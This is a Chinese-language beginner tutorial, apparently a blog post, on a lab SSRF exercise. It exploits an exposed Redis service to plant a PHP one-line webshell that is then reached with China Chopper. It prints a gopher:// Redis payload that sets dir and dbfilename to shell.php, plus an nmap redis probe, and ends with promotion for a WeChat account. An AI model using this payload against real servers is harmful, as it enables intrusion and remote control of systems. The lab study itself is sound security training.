小白都能掌握的黑客技术(带小白黑客入门)


小编这几天一直在做关于ssrf的实验,这篇文章可以带纯小白黑客入门。

靶机ip地址:192.168.2.138

小白都能掌握的黑客技术(带小白黑客入门)(1)


查看靶机运行的redis服务。

小白都能掌握的黑客技术(带小白黑客入门)(2)


攻击机为ip192.168.2.112.

小白都能掌握的黑客技术(带小白黑客入门)(3)


用客户端redis-cli连接攻击机。

小白都能掌握的黑客技术(带小白黑客入门)(4)


然后输入命令。

小白都能掌握的黑客技术(带小白黑客入门)(5)

最后用save来保存。

小白都能掌握的黑客技术(带小白黑客入门)(6)


然后进入靶机的docker的redis看看有没有test.php.

小白都能掌握的黑客技术(带小白黑客入门)(7)

查看一下test.php的内容。

小白都能掌握的黑客技术(带小白黑客入门)(8)


此时,就可以用菜刀连接了。


那我们换种方式来。

先用kali来查看一下靶机(192.168.2.138)的6379端口的信息


小白都能掌握的黑客技术(带小白黑客入门)(9)


用攻击机(192.168.1.112)来使用gopher-redis-auth-master来加载负载。


小白都能掌握的黑客技术(带小白黑客入门)(10)


小白都能掌握的黑客技术(带小白黑客入门)(11)

gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $34 *4 $6 config $3 set $3 dir $5 /data *4 $6 config $3 set $10 dbfilename $9 shell.php *1 $4 save

把这个复制到我的kali上,然后把127.0.0.1改成目标的ip


小白都能掌握的黑客技术(带小白黑客入门)(12)


进入192.168.2.138靶机的的docker的/data上查看有无写入

小白都能掌握的黑客技术(带小白黑客入门)(13)

成功写入。

小白都能掌握的黑客技术(带小白黑客入门)(14)

查看dump.rdb的内容

小白都能掌握的黑客技术(带小白黑客入门)(15)


此时,写入了一句话木马,这时候就可以用菜刀连接了。


最后还可以使用kali的nmap -p 6379 –script redis –info 192.168.2.138探测ssrf漏洞。

小白都能掌握的黑客技术(带小白黑客入门)(16)

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)

就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页